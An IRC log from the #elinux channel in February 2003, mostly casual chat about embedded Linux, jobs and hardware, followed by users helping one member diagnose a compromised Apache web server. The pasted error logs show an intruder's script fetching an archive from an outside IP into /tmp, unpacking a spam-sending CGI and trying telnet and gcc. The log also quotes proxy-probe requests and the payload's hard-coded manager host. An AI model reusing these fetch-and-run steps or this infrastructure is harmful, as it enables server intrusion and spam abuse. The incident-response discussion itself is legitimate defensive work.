irclog2html for #elinux on 20030204

`00:08.22`	`*** part/#elinux Rocinante ([5+adKfX28@12-254-194-122.client.attbi.com)`
`00:08.27`	`*** join/#elinux TomW (tom@24.229.147.16)`
`00:10.19`	`sjhill`	`hi TomW`
`00:10.37`	`TomW`	`Good morning`
`00:10.40`	`sjhill`	`sorphin: wake up boy`
`00:11.01`	`sjhill`	`TomW: you old people don't keep track of time well do you?`
`00:11.05`	`sjhill`	`:)`
`00:11.07`	`TomW`	`I have been neck deep in 8051 code lately. :/`
`00:11.11`	`sjhill`	`ah`
`00:11.25`	`sjhill`	`you have my condolences`
`00:11.50`	`TomW`	`I do cross development on GNU C, debug it with gdb, then shove it into the controller for final testing.`
`00:13.28`	`TomW`	`I have the dosemu loaded so I can run the old dos based C compiler / assembler. My make file system modifies the autoexec.bat of the dosemu, then invokes dosemu, dosemu build the stuff then exits. Pretty slick setup!`
`00:14.39`	`TomW`	`sjhill: I can use the linux command line utils to grep, cut, etc.. Also use the GNU make & perl to manage the whole process, and finally, use cvs to keep track of the changes.`
`00:14.59`	`TomW`	`sjhill: what's up?`
`00:16.34`	`sjhill`	`TomW: nothing, just trying to get things wrapped up before i leave for my new job this weekend...moving to pittsburgh`
`00:17.58`	`TomW`	`cool! You going to do some of the linux stuff I see advertised in the want ads?`
`00:20.43`	`CosmicPenguin`	`TomW: you see Linux stuff advertised in want ads?`
`00:21.50`	`sjhill`	`TomW: i'm going to work for TimeSys to hard real-time embedded linux....maybe real-time java eventually if they want me to`
`00:22.34`	`CosmicPenguin`	`real time Java? I understand those words, but do they go together?`
`00:22.58`	`Lethal`	`ew. rt java. ew.`
`00:23.37`	`Lethal`	`talk about having too much free time`
`00:24.00`	`TomW`	`CosmicPenguin: up at dice.com. There is some embedded stuff going on in Pittsburg, Pa.`
`00:24.35`	`TomW`	`sjhill: yeah, I've seen the ads on dice.com for that Timesys company.`
`00:25.20`	`TomW`	`sjhill: I wonder how you got a job there? Didn't they want a "linux guru", somebody like Allan Cox?`
`00:25.23`	`TomW`	`sjhill: heh`
`00:26.25`	`CosmicPenguin`	`TomW: sjhill probably falls in that category`
`00:26.51`	`TomW`	`ok, just couldn't resist saying that! :-D`
`00:30.00`	`sjhill`	`heh`
`00:30.28`	`sjhill`	`TomW: the interview process was a bit tough, but they hired Lethal which means they'll take about anyone`
`00:30.35`	`sjhill`	`heh`
`00:30.41`	`TomW`	`LOL!`
`00:31.07`	`TomW`	`Really desperate for talent, eh? Sounds like my kind of situation!`
`00:31.34`	`Lethal`	`sjhill, erm. don't make me kick your ass.`
`00:32.35`	`Lethal`	`sjhill, manas might not even be in on the monday you start, so you might get lucky ;P`
`00:34.31`	`sjhill`	`Lethal: why, would he inundate me with stuff?`
`00:35.40`	`Lethal`	`sjhill, doubt it. we already hired someone to attempt to make gdb not suck, so there's like 90% of the company engineering effort out the window :P`
`00:36.36`	`sjhill`	`heh`
`00:39.57`	`TimRiker`	`how many are they hiring? do you have to be local?`
`00:40.24`	`Lethal`	`still hiring selectively, and yes, unfortunately you have to be local :P`
`00:40.44`	`TimRiker`	`silicon valley, yes? /me does not care to move there.`
`00:40.58`	`Lethal`	`no, pittsburgh, pa.`
`00:41.02`	`Lethal`	`I liked silicon valley considerably more.`
`00:41.20`	`Tangent`	`Hooray.. I have debian via nfs running on my tuxscreen and am sshing in :)...`
`00:41.26`	`Tangent`	`Now time for some swapspace...`
`00:41.37`	`TimRiker`	`ah. that's different. I'd consider pittsburg. got relatives in NY and philly.`
`00:41.50`	`Lethal`	`ah`
`00:42.02`	`Lethal`	`well, at least the cost of living here is cheap :P`
`00:42.27`	`TimRiker`	`yeah, that's the main reason I avoid silicon valley positions.`
`00:42.41`	`TimRiker`	`cost of living is 214% what is is here.`
`00:42.48`	`Lethal`	`silicon valley positions are great if you can work remotely ;P`
`00:43.39`	`CosmicPenguin`	`TimRiker: can't get much cheaper than SLC, unless you live in poedunk texas`
`00:44.06`	`TimRiker`	`looks like pittsburg is 7% higher than Provo/Orem`
`00:44.33`	`Lethal`	`yeah, but whats there to do in slc? :P`
`00:44.42`	`CosmicPenguin`	`Lethal: you would be surprised`
`00:44.44`	`sorphin`	`ibot: cluebat sjhill`
`00:44.45`		`ACTION pulls out a ClueBat (tm) and thwaps sjhill.`
`00:44.47`	`TimRiker`	`Lethal: well then they aren't silicon valley positions are they? ;-)`
`00:45.28`	`Lethal`	`not enough people hiring these days`
`00:46.20`	`TimRiker`	`outskirts like "Plum" ... (where's that?) are actually cheaper than here. wow.`
`00:47.12`	`Lethal`	`plum isn't far from here. most places are really just suburbs.`
`00:47.12`	`Lethal`	`I'm in monroeville.`
`00:47.19`	`Lethal`	`its pretty cheap here`
`00:47.22`	`TimRiker`	`well, pass on a resume if they are interested http://rikers.org/resume.htm I'm off to dinner. flying to dallas for an interview this weekend.`
`00:48.00`	`TimRiker`	`monroeville shows +1.5% from here. not bad.`
`00:51.52`	`TomW`	`Lethal: one of the reasons I moved to Pa 15 years ago, I could afford to live here!`
`00:53.55`	`Tangent`	`Has anyone got an nbd module for strongarm ?`
`00:54.06`	`Lethal`	`TomW, heh`
`00:54.09`	`Tangent`	`2.4.18-rmk6-tux1`
`00:54.32`	`TomW`	`Tangent: didn't 2.4.18 have some bugs in it?`
`00:54.33`	`Lethal`	`TomW, I moved here from san jose, so the housing costs were a nice surprise ;P`
`00:54.43`	`Tangent`	`TomW: No idea... I'm obsolete`
`00:55.16`	`Tangent`	`If I can make swap work, I'll build a new kernel for it`
`00:55.32`	`TomW`	`Lethal: WHEW! Yeah, I know about the housing costs around San Jose. I stayed in Santa Cruz about 30 years ago and San Jose was big-time expensive back then!`
`00:56.19`	`TomW`	`Tangent: they are telling the mainstream linux users to upgrade to 2.4.19 because of some problem.`
`00:56.35`	`Lethal`	`santa cruz is cool, I had some friends there, the commute just sucked :P`
`00:57.10`	`Tangent`	`TomW: 6 months ago I upgraded to 2.4.18.. and today I got around to booting it..... That's why I'm reluctant to upgrade the kernel today...`
`00:57.23`	`Tangent`	`It'll just be a whole new load of hassles`
`00:57.51`	`Lethal`	`wow, I hate our mail system. I get one piece of spam, and then I get an automated mail from IT telling me I have spam.`
`00:57.52`	`Lethal`	`wtf.`
`00:58.13`	`kergoth`	`spammed by IT. what else is new`
`00:58.14`	`Tangent`	`What a sweet system :_`
`00:58.41`	`Tangent`	`I get two bounce messages delivered to me for every piece of spam that fails to get delivered to non-existant users`
`00:58.54`	`Lethal`	`kergoth, its not so bad in small volume. but I just got half a dozen of them. most irritating.`
`00:59.11`	`Lethal`	`not to mention, I don't need another piece of spam relaying the fact I have mail.`
`00:59.41`	`Lethal`	`they need to limit this behavior to outlook folk.`
`00:59.53`	`Lethal`	`they should be quarantined anyways.`
`01:08.15`	`Tangent`	`My mail goes through realtime blackhole list + amavis + sanitizer + spamassassin`
`01:08.46`	`Tangent`	`There's still about 2 a month that make it to the inbox tho'`
`01:08.52`	`Lethal`	`I usually just filter out marketing + *@gnu.org to /dev/null and it cuts out about 90% of my spam`
`01:15.30`	`Tangent`	`ibot tuxscreen kernel`
`01:15.31`		`no idea, Tangent`
`01:15.39`	`Tangent`	`ibot tuxscreen patches`
`01:15.40`		`Tangent: parse error: dunno what the heck you're talking about`
`01:41.24`	`Tangent`	`Is there not some convenient stash of pre-built kernels and modules for the tux?`
`01:47.29`	`TomW`	`Tangent: to go back in version or up in version?`
`01:48.00`	`Tangent`	`TomW: Either`
`01:48.18`	`Tangent`	`TomW: either NBD modules for 2.4.18, or whole new kernel + nbd modules`
`01:50.18`	`TomW`	`for the basic ARM stuff, goto ftp://ftp.arm.linux.org.uk/pub/armlinux/source/kernel-patches/v2.4`
`01:52.51`	`TomW`	`Tangent: check out: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/tuxscreen/buildroot-tux/make/linux.mk`
`01:53.12`	`TomW`	`Tangent: Erik checked in the rmk-2.4.19 patches less than a day ago.`
`02:08.25`	`Tangent`	`TomW: I've got buildroot going already... It's just that it takes _ages_`
`02:08.48`	`Tangent`	`Anyhow.. I'm off to bed...`
`02:08.49`	`Tangent`	`Night all`
`02:09.57`	`jacques_gone`	`hi`
`02:10.12`	`jacques`	`i was at surpluscomputers again on sunday`
`02:10.18`	`jacques`	`they have webpals again`
`02:10.27`	`jacques`	`$12.95`
`02:10.38`	`jacques`	`$7.95 if you dont want the modem!`
`02:16.21`	`TomW`	`jacques: hello`
`02:17.06`	`TomW`	`jacques: really! Guess you'll have to go to a computer show and purchase some old ISA stuff, eh?`
`02:17.55`	`jacques`	`TomW: you mean to replace the modem?`
`02:18.03`	`jacques`	`does hte webpal have an isa slot?`
`02:20.46`	`TomW`	`jacques: yes, a limited one. Only has a single IRQ line for it.`
`02:24.03`	`TomW`	`jacques: a good site for the webpal is at: http://www.geocities.com/webpalstuff/`
`02:24.47`	`TomW`	`jacques: he does have a complete set of schematics, but they are in Eagle CAD. You will have to download the freebie Eagle from: http://www.cadsoft.de`
`02:25.14`	`TomW`	`jacques: he did an excellent job of doing the schematics, really professional job!`
`02:47.18`	`jacques`	`cool`
`02:50.55`	`MonMotha`	`there are PDFs of the schematics up if you don't have eagle and are too lazy to install it (like me)`
`03:05.40`	`*** join/#elinux scanline (~micah@aden2-42-dhcp.resnet.Colorado.EDU)`
`03:14.57`	`sorphin`	`scanline: heh, on ebay, all episodes of mavgyver, heh`
`03:15.06`	`scanline`	`hehe`
`03:15.36`	`sorphin`	`scanline: the vcd ones are pricey as hell, someone has cheaper vhs in good shape (a few fulls)`
`03:46.25`	`CosmicPenguin`	`Damn turbotax site just went down`
`03:50.22`	`andersee`	`CosmicPenguin: speaking of taxes... did you get that 1099 form?`
`04:01.38`	`CosmicPenguin`	`andersee: yeah... :)`
`04:01.48`	`CosmicPenguin`	`andersee: owe the gomment some money, I guess`
`04:08.10`	`*** join/#elinux Rocinante ([4W6ugZwlz@12-254-194-122.client.attbi.com)`
`04:08.31`	`Rocinante`	`CosmicPenguin: I'll catch up with you in the morning...Things came up`
`04:19.44`	`*** part/#elinux Rocinante ([4W6ugZwlz@12-254-194-122.client.attbi.com)`
`05:28.17`	`*** join/#elinux ChanServ (ChanServ@services.)`
`05:28.17`	`*** mode/#eLinux [+o ChanServ] by calvino.freenode.net`
`12:45.57`	`*** join/#elinux mallum (~mallum@pc-80-193-218-21-hw.blueyonder.co.uk)`
`14:42.02`	`*** join/#elinux GPSFan (~kenm@65.114.238.130)`
`14:52.20`	`*** join/#elinux Rocinante ([MFzRVPw2O@12-254-194-122.client.attbi.com)`
`15:09.20`	`CosmicPenguin`	`Morning folks`
`15:22.40`	`*** join/#elinux prpplague (~JoeBob1@12.148.134.9)`
`15:22.40`	`*** mode/#eLinux [+o prpplague] by ChanServ`
`15:23.48`	`sorphin`	`CosmicPenguin: lo`
`15:23.52`	`sorphin`	`prpplague: morning dave`
`15:23.57`	`prpplague`	`sorphin: hey`
`15:24.07`	`prpplague`	`whats up today guys?`
`15:24.13`	`CosmicPenguin`	`se�or POS!`
`15:24.37`	`prpplague`	`si`
`15:24.56`	`sorphin`	`prpplague: when i said yesterday i was getting prpplague type gear on ebay, i meant POS stuff ;) (specifically still trying to get a mag stripe reader i don't have to try and run through the fscking game port or shiz)`
`15:25.36`	`sorphin`	`heh`
`15:25.37`	`sorphin`	`Comdex Operators File for Bankruptcy`
`15:25.49`	`sorphin`	`good thing i've never even been to it ;p`
`15:26.33`	`prpplague`	`sorphin: ahh`
`15:27.07`	`sorphin`	`oen thing i hate about ebay sometimes.. something's 4 DAYS out`
`15:27.11`	`sorphin`	`and someone bids :P`
`15:27.23`	`sorphin`	`like it's ending tomorrow or somehting ;p`
`15:27.50`	`CosmicPenguin`	`sorphin: newbies`
`15:28.01`	`sorphin`	`annoyances is more like`
`15:28.29`	`sorphin`	`CosmicPenguin: so since they made you stay, when can we expect pixil? ;)`
`15:30.24`	`CosmicPenguin`	`sorphin: check the address on my name - I am no longer an employee of Century Software`
`15:30.58`	`prpplague`	`CosmicPenguin: ?`
`15:31.03`	`prpplague`	`CosmicPenguin: you get axed?`
`15:31.35`	`CosmicPenguin`	`prpplague: yep`
`15:34.08`	`prpplague`	`CosmicPenguin: damm`
`15:34.16`	`prpplague`	`CosmicPenguin: overnight?`
`15:39.00`	`CosmicPenguin`	`prpplague: yesterday some time`
`15:39.17`	`prpplague`	`CosmicPenguin: man`
`15:39.29`	`prpplague`	`CosmicPenguin: so is it just greg now?`
`15:39.38`	`CosmicPenguin`	`prpplague: as far as engineers?`
`15:39.49`	`CosmicPenguin`	`prpplague: my old supervisor Jason is still there, they are the programmers`
`15:40.11`	`CosmicPenguin`	`prpplague: anyway, I was given a month of consulting to finish up Pixil`
`15:40.31`	`prpplague`	`CosmicPenguin: atleast thats something`
`15:49.10`	`sorphin`	`CosmicPenguin: layoff or fire ?`
`15:49.37`	`prpplague`	`sorphin: fired, he got caught with too much pr0n on the company server :)`
`15:49.46`	`sorphin`	`prpplague: sound about right ;)`
`15:49.50`	`sorphin`	`+s`
`15:52.50`	`CosmicPenguin`	`sorphin: so what you are saying is that I shouldn't have mooned the CEO?`
`15:54.19`	`sorphin`	`CosmicPenguin: right`
`15:55.24`	`prpplague`	`CosmicPenguin: did you beat yourself up like on fightclub?`
`15:55.56`	`CosmicPenguin`	`prpplague: no, but thats a good thought for next time... :)`
`15:56.39`	`*** join/#elinux sieve (~sieve@12.148.134.9)`
`15:57.14`	`sieve`	`morning`
`15:57.19`	`sorphin`	`speaking of people that need to be removed from employment, that shipping chick at abcsinc needs to be ;p`
`15:57.22`	`prpplague`	`sieve: you get that memo about your tps reports?`
`15:58.01`	`Rocinante`	`signal11: Thanks for setting up the forwarding`
`15:58.03`	`prpplague`	`sorphin: lol, which reminds me, i need to get down there and get you guys stuff shipped`
`15:58.13`	`signal11`	`Rocinante: any time`
`15:58.22`	`CosmicPenguin`	`signal11: do me a huge favor?`
`15:58.27`	`signal11`	`CosmicPenguin: sure`
`15:58.36`	`CosmicPenguin`	`go to cosmic and turn on the ssh server?`
`15:59.19`	`sorphin`	`CosmicPenguin: are you doing an sjhill? ;)`
`15:59.25`	`CosmicPenguin`	`sorphin: ??`
`15:59.41`	`sorphin`	`l33ching from the company before you go ;)`
`16:00.14`	`CosmicPenguin`	`sorphin: well, I am still technically a consultant - and I spent about 2 weeks getting my FVWM settings right, and I really don't want to do that again`
`16:00.27`	`sorphin`	`hehe`
`16:00.46`	`sorphin`	`haven't used fvwm in years ;)`
`16:03.05`	`kergoth`	`hey`
`16:03.19`	`sorphin`	`lo digichris`
`16:03.49`	`prpplague`	`kergoth: the fun with netsilicon continues, had 3 voicemails this morning`
`16:03.49`	`kergoth`	`man, putting my name and digi in the same word is just _mean_ :)`
`16:04.02`	`kergoth`	`prpplague: damn, insistant bastards arent they`
`16:04.09`	`prpplague`	`kergoth: no kidding`
`16:04.33`	`prpplague`	`kergoth: "if you come to the trainning session you could win a free digi-connect!"`
`16:04.34`	`sorphin`	`kergoth: hey, you're the one htat works for em ;p`
`16:04.58`	`kergoth`	`prpplague: oh wow! you better sign up for that! :P`
`16:06.02`	`*** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com)`
`16:06.17`	`Morn`	`bloody hell`
`16:06.51`	`sorphin`	`Morn: ?`
`16:07.28`	`prpplague`	`Morn: not destroying cell phones this morning are you?`
`16:07.34`	`Morn`	`some joker keeps trying to use my web server to launch a spam attack`
`16:07.43`	`sorphin`	`Morn: been there, see that`
`16:07.44`	`Morn`	`prpplague: no, I lost my cell phone in a NYC cab yesterday`
`16:07.50`	`sorphin`	`Morn: you should see my web logs :P`
`16:07.53`	`sorphin`	`Morn: doh`
`16:07.57`	`Morn`	`sorphin: do you know how it works?`
`16:08.05`	`Morn`	`I can't find the hole they are using`
`16:08.13`	`Morn`	`they are uploading a perl script`
`16:08.22`	`SmithMatt`	`paste in some of your logs`
`16:08.23`	`sorphin`	`formmail.pl ?`
`16:08.29`	`sorphin`	`or such`
`16:08.34`	`Morn`	`I see them TRYING to use that, but this is different`
`16:08.35`	`sorphin`	`that's an old one`
`16:08.50`	`sorphin`	`they're not trying to upload it`
`16:08.52`	`sorphin`	`they're trying to USE it`
`16:08.59`	`Morn`	`flood alert`
`16:09.04`	`Morn`	`HTTP request sent, awaiting response... 200 OK`
`16:09.05`	`Morn`	`Length: 10,170 [application/x-tar]`
`16:09.05`	`Morn`	`<PROTECTED>`
`16:09.05`	`Morn`	02:27:03 (18.09 KB/s) - `/tmp/af56j/archive.tgz' saved [10170/10170]
`16:09.05`	`Morn`	`tar: guestbook.cgi: time stamp 2003-02-04 02:28:27 is 84 s in the future`
`16:09.05`	`Morn`	`gzip: stdin: unexpected end of file`
`16:09.07`	`Morn`	`tar: Child returned status 1`
`16:09.09`	`Morn`	`tar: Error exit delayed from previous errors`
`16:09.11`	`Morn`	`tar: guestbook.cgi: time stamp 2003-02-04 02:28:27 is 84 s in the future`
`16:09.13`	`Morn`	`sh: line 1: /usr/bin/telnet: Permission denied`
`16:09.18`	`Morn`	`that's in the /var/log/httpd/error_log`
`16:09.20`	`sorphin`	`ummm`
`16:09.30`	`sorphin`	`cute`
`16:09.38`	`Morn`	`And I see that they are trying to use gcc and and stuff`
`16:09.46`	`Morn`	`but I locked down the compilers and the network tools`
`16:09.53`	`sorphin`	`you have a hole in your apache`
`16:10.00`	`sorphin`	`or that guestbook cgi`
`16:10.05`	`Morn`	`no shit`
`16:10.08`	`SmithMatt`	`totally.. they're already running stuff... they just haven't run the bomb yet.`
`16:10.10`	`Morn`	`no, they are uploading guestbook.cgi`
`16:10.17`	`sorphin`	`uhh`
`16:10.35`	`Morn`	`guestbook.cgi sets off a major spam attack`
`16:10.39`	`sorphin`	`don't allow POST :P`
`16:10.47`	`Morn`	`starts like 70 processes spamming`
`16:10.54`	`SmithMatt`	`a good place to start would be to kill apache...`
`16:11.00`	`Morn`	`I can't kill apache`
`16:11.05`	`sorphin`	`upgrade apache, disable POST`
`16:11.11`	`Morn`	`I run a business that requires apache`
`16:11.15`	`Morn`	`and I can't just turn off POST`
`16:11.20`	`sorphin`	`uhh`
`16:11.20`	`Morn`	`all the web forms would stop working`
`16:11.23`	`SmithMatt`	`you're running a spam business right now... pick one.`
`16:11.27`	`sorphin`	`then restrict it :P`
`16:11.28`	`Morn`	`my clients would shit`
`16:11.35`	`SmithMatt`	`what apache version?`
`16:11.35`	`Morn`	`I actually stopped the spam thing`
`16:11.58`	`Morn`	`it creates a dir in tmp named a56j or something I set the permissions unwritable for that dir`
`16:12.05`	`Morn`	`so it can't untar the spam attack`
`16:12.21`	`sorphin`	`heh`
`16:12.22`	`Morn`	`apache-1.3.26-6.1mdk`
`16:12.41`	`sorphin`	`this is why i make my webserver unuseable to outsiders ;)`
`16:12.44`	`Morn`	`I have the latest security updates from Mandrake`
`16:12.54`	`Morn`	`sorphin: I have paying web clients`
`16:13.00`	`sorphin`	`Morn: that's not what i mean`
`16:13.00`	`sorphin`	`:P`
`16:13.02`	`Morn`	`the whole point is so outside users can use it`
`16:13.10`	`sorphin`	`you misread what i say :P`
`16:13.33`	`Morn`	`I'm trying to figure out how they are uploading the file`
`16:13.38`	`Morn`	`and as of yet I don't see it`
`16:13.41`	`sorphin`	`uhh`
`16:13.46`	`sorphin`	`post prolly :P`
`16:13.47`	`Morn`	`it doesn't appear to be a bad cgi script`
`16:14.05`	`sorphin`	`it'd be in access_log prolly`
`16:14.06`	`Morn`	`I don't see any POST's in the logs that would indicate this`
`16:14.14`	`Morn`	`I did a grep on all posts`
`16:14.17`	`sorphin`	`well, a GET can't push a file`
`16:14.24`	`sorphin`	`to the server`
`16:15.07`	`Morn`	`www.magenet.com-access_log:ns2a.nlenet.net - - [03/Feb/2003:07:44:43 -0500] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 317`
`16:15.11`	`Morn`	`www.magenet.com-access_log:ns2a.nlenet.net - - [03/Feb/2003:07:44:43 -0500] "POST /cgi-bin/formmail.cgi HTTP/1.1" 404 318`
`16:15.11`	`Morn`	`there are tons of those`
`16:15.15`	`sorphin`	`yup`
`16:15.24`	`Morn`	`but they are all 404`
`16:15.28`	`sorphin`	`that's the old one i was talking about`
`16:15.36`	`Morn`	`I don't see any sucessful POST's that would result in this`
`16:15.43`	`sorphin`	`timestamp match against the error log :P`
`16:15.55`	`Morn`	`I tried that`
`16:16.04`	`sorphin`	`send me your logs, julie`
`16:16.12`	`Morn`	`the FormMail requests happen very CLOSE to the other`
`16:16.29`	`Morn`	`I saw`
`16:16.38`	`Morn`	`I can't do that easily`
`16:16.51`	`Morn`	`My logs are HUGE and there are many of them`
`16:16.56`	`sorphin`	`umm`
`16:17.05`	`sorphin`	`i only need the logs that have that time frame in them ;p`
`16:17.06`	`Morn`	`I have 60 different web hosts running`
`16:17.37`	`sorphin`	`that's nice.. i only need the applicable access/error logs from the "host" that was attacked`
`16:17.50`	`Morn`	`what address?`
`16:18.05`	`Morn`	`email address that is`
`16:18.17`	`sorphin`	`that one`
`17:10.49`	`sorphin`	`Morn: heh, ironic that yesterday there was a story on /. about cgi-shell, and you have a cgi exploit goin on ;p`
`17:16.49`	`Morn`	`Is it possible to use a PUT to do this?`
`17:17.11`	`sorphin`	`might be, forgot if there is a put`
`17:17.37`	`Morn`	`I'm not sure it is CGI related`
`17:17.39`	`Morn`	`right now I just have no idea what the deal is`
`17:18.11`	`sorphin`	`heh`
`17:18.12`	`sorphin`	`POST http://127.0.0.1:25/`
`17:18.15`	`sorphin`	`you get some fun ones`
`17:18.17`	`sorphin`	`i'll say htat ;p`
`17:18.29`	`Morn`	`yeah, all kinds of weird stuff in there`
`17:18.35`	`sorphin`	`CONNECT http://127.0.0.1:25/`
`17:18.42`	`sorphin`	`i see people try and use my webserver as a proxy`
`17:20.30`	`sorphin`	`Morn: your access log doesn't go back far enough`
`17:20.39`	`sorphin`	`this is from the 3rd, hte exploit was on the 1st`
`17:20.55`	`Morn`	`the exploit happened again on the 3rd`
`17:21.00`	`Morn`	`around 6am`
`17:21.08`	`Morn`	`that's why I put the 3rd in there`
`17:21.16`	`sorphin`	`sheesh`
`17:21.23`	`sorphin`	`it happened a LOT`
`17:21.26`	`Morn`	`no shit`
`17:21.32`	`Morn`	`that's why I'm worried`
`17:21.46`	`Morn`	`I can't see how it's happening`
`17:21.54`	`Morn`	`this is like driving blind`
`17:22.10`	`sorphin`	`lemme pull the archive thye're using`
`17:22.21`	`Morn`	`I tried to find it on google`
`17:22.25`	`Morn`	`I didn't have any luck`
`17:22.39`	`Morn`	`I was trying to find something on how to do this`
`17:22.44`	`Morn`	`so I could plug it`
`17:23.04`	`sorphin`	`haha`
`17:23.10`	`sorphin`	`you're being attacked from russia :P`
`17:23.18`	`Morn`	`oh?`
`17:23.28`	`sorphin`	`yeah`
`17:23.33`	`sorphin`	`whois on this IP :P`
`17:23.34`	`sorphin`	`217.106.122.58`
`17:23.43`	`sorphin`	`descr: Stack Ltd.`
`17:23.43`	`sorphin`	`descr: Russia, Siberia, Tomsk`
`17:24.32`	`sorphin`	`eww.. use use suexec ?`
`17:24.37`	`sorphin`	`you even`
`17:24.47`	`Morn`	`it's part of the default install`
`17:24.51`	`Morn`	`I had plans to use it`
`17:24.57`	`Morn`	`but I never did that project`
`17:24.59`	`sorphin`	`until you intend to do so`
`17:25.02`	`sorphin`	`i'd turn it off`
`17:25.03`	`sorphin`	`:P`
`17:28.50`	`*** join/#elinux TimRiker (timr@rikers.org)`
`17:28.51`	`*** mode/#eLinux [+o TimRiker] by ChanServ`
`17:29.01`	`sorphin`	`TimRiker: hola`
`17:29.35`	`TimRiker`	`hola. como estas?`
`17:29.40`	`sorphin`	`eh..`
`17:29.59`	`sorphin`	`TimRiker: trying to help Morn find how someone's getting this exploit through her webserver`
`17:30.17`	`sorphin`	`the logs show no PUT/POST`
`17:30.22`	`TimRiker`	`ooh.. sploits`
`17:30.25`	`sorphin`	`yup`
`17:31.21`	`sorphin`	`TimRiker: this look familiar? (incoming flood)`
`17:31.23`	`sorphin`	`which: no fetch in (/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin)`
`17:31.24`	`sorphin`	`guestbook.cgi: no process killed`
`17:31.24`	`sorphin`	`perl: no process killed`
`17:31.24`	`sorphin`	`sh: line 1: fetch: command not found`
`17:31.24`	`sorphin`	`--05:15:48-- http://217.106.122.58/archive.tgz`
`17:31.26`	`sorphin`	`<PROTECTED>`
`17:31.28`	`sorphin`	`Connecting to 217.106.122.58:80... connected.`
`17:31.30`	`sorphin`	`HTTP request sent, awaiting response... 200 OK`
`17:31.32`	`sorphin`	`Length: 92,695 [application/x-tar]`
`17:31.34`	`sorphin`	`<PROTECTED>`
`17:31.36`	`sorphin`	`<PROTECTED>`
`17:31.38`	`sorphin`	05:15:49 (72.19 KB/s) - `/tmp/af56j/archive.tgz' saved [92695/92695]
`17:31.40`	`sorphin`	`tar: guestbook.cgi: time stamp 2003-02-01 05:18:13 is 144 s in the future`
`17:31.42`	`sorphin`	`gzip: stdin: unexpected end of file`
`17:31.44`	`sorphin`	`tar: Child returned status 1`
`17:31.46`	`sorphin`	`tar: Error exit delayed from previous errors`
`17:31.48`	`sorphin`	`tar: guestbook.cgi: time stamp 2003-02-01 05:18:13 is 144 s in the future`
`17:31.50`	`sorphin`	`ls: /tmp/af56j/guestbook.cgi: No such file or directory`
`17:32.00`	`sorphin`	`the technique that is`
`17:32.36`	`sorphin`	`it appears to be a perl script w/ some perl modules, cna't figure how they're stuffing it through.. i got sploited via DNS ages ago, but that was fixed w/ an upgrade`
`17:33.09`	`sorphin`	`ooh`
`17:33.18`	`sorphin`	`someone was definately bored (as i look at this script)`
`17:33.23`	`Morn`	`as a temp fix I made the permissions on /tmp/af56j 000`
`17:34.16`	`Morn`	`bored?`
`17:34.29`	`sorphin`	`yeah, to go through the trouble of writing this crap`
`17:34.45`	`Morn`	`the weird thing is it seems to clean up after itself`
`17:34.53`	`Morn`	`I mean the original archive.tgz gets erased`
`17:34.58`	`Morn`	`whatever it was trying to compile`
`17:35.11`	`Morn`	`and I killed the webserver before backing up that dir`
`17:35.12`	`sorphin`	`it's all perl`
`17:35.22`	`sorphin`	`the guestbook bit`
`17:35.22`	`Morn`	`but look, there are attempts to use gcc`
`17:35.28`	`Morn`	`which failed`
`17:35.46`	`Morn`	`because only the people with permission can run the compilers`
`17:35.50`	`sorphin`	`not in the archive.tgz there aren't`
`17:35.55`	`Morn`	`and apache isn't in that list`
`17:35.59`	`sorphin`	`maybe it grabs something else`
`17:36.10`	`sorphin`	`but this archive is just a listener`
`17:36.10`	`Morn`	`did you find archive.tgz?`
`17:36.20`	`sorphin`	`yes`
`17:36.27`	`sorphin`	`it's in your logs julie`
`17:36.28`	`Morn`	`can you send it to me, or give me a link`
`17:36.40`	`sorphin`	`--07:33:57-- http://217.106.122.58/archive.tgz`
`17:36.44`	`sorphin`	`right there`
`17:36.49`	`Morn`	`doh!`
`17:36.52`	`sorphin`	`;)`
`17:36.54`	`Morn`	`I'm an idiot`
`17:36.58`	`sorphin`	`:)`
`17:38.43`	`Morn`	`it couldn't use telnet either`
`17:38.49`	`sorphin`	`hehe`
`17:38.49`	`Morn`	`you have to be in the ntools group for that`
`17:38.57`	`sorphin`	`rotfl`
`17:39.05`	`sorphin`	`</anal>`
`17:39.22`	`Morn`	`?`
`17:39.26`	`sorphin`	`you`
`17:39.34`	`sorphin`	`everything in it's own lil groups`
`17:39.46`	`Morn`	`This could have been worse if I hadn't have done that`
`17:39.51`	`sorphin`	`true`
`17:39.57`	`sorphin`	`i never get to that point tho`
`17:40.21`	`sorphin`	`the webserver does nothing but webserve`
`17:40.58`	`sorphin`	`but everything is controlled`
`17:41.02`	`Morn`	`my server is multifunctional`
`17:41.12`	`Morn`	`since it is a shell server too`
`17:41.18`	`sorphin`	`heh`
`17:41.22`	`sorphin`	`diff box for that :P`
`17:41.25`	`Morn`	`which is part of the reason for the multiple group settings`
`17:41.34`	`Morn`	`500 users can get out of control`
`17:41.40`	`sorphin`	`uhhhh`
`17:41.45`	`sorphin`	`you're nuts ;)`
`17:42.01`	`Morn`	`my doctor would agree (giggle)`
`17:42.08`	`sorphin`	`i'm sure :P`
`17:42.24`	`Morn`	`he seems happy with the dvd I converted for him though`
`17:42.37`	`Morn`	`but he really didn't understand a word I babbled about how I did it`
`17:42.41`	`sorphin`	`hehe`
`17:42.52`	`sorphin`	`still not sure about my dvd2one probs`
`17:43.07`	`Morn`	`his was the PAL->NTSC conversion`
`17:43.12`	`Morn`	`I think it came out very nice`
`17:43.20`	`sorphin`	`how'd you do it ?`
`17:43.57`	`Morn`	`the actually conversion I used tmpgenc+ for`
`17:44.10`	`Morn`	`but I did a lot of work to get the subtitles right`
`17:44.15`	`Morn`	`and keep the audio in sync`
`17:44.24`	`sorphin`	`nod`
`17:44.35`	`Morn`	`it takes tmpgenc a LONG time to do a PAL->NTSC conversion`
`17:44.40`	`sorphin`	`julie`
`17:44.44`	`Morn`	`6.5 hours on my box for 1.5 hours of video`
`17:44.52`	`sorphin`	`it takes tmpgenc a long time to do ANYTHING :P`
`17:46.14`	`Morn`	`If I block that IP it'll help right?`
`17:46.16`	`sorphin`	`man this "sploit" as tim calls them, is humorous`
`17:46.29`	`Morn`	`that way the script can't contact the 'managerHost' and get info`
`17:46.31`	`sorphin`	`it'll prevent them from pulling that file, yes`
`17:46.45`	`sorphin`	`and if the whole thing is coming from that IP`
`17:46.52`	`sorphin`	`you'll block that too`
`17:46.56`	`Morn`	`well, it contacts that ip for more than just the file`
`17:47.18`	`sorphin`	`taht's the stuff i want to see ;)`
`17:47.19`	`Morn`	`my $managerHost="217.106.122.58";`
